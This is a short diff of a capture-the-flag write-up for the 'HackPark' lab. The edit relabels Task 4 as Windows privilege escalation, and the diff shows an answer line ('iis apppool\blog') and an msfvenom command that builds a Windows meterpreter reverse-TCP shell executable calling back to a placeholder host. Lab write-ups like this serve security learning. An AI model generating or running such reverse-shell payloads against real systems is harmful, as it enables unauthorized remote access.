jeffscyberjournal/CTFbin/HackPark.md

 ```
 Answer:iis apppool\blog

-# Task 4
+# Task 4 Windows Privilege Escalation

-Here a more stable reverse shell is the goal that from the exploit so a msfvenom payload is required for a windows system:
+Here a more stable reverse shell is the goal that from the exploit so a msfvenom meterpreter payload is required for a windows system:
 ```
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YOUR_IP] LPORT=4444 -f exe > shell.exe
 ```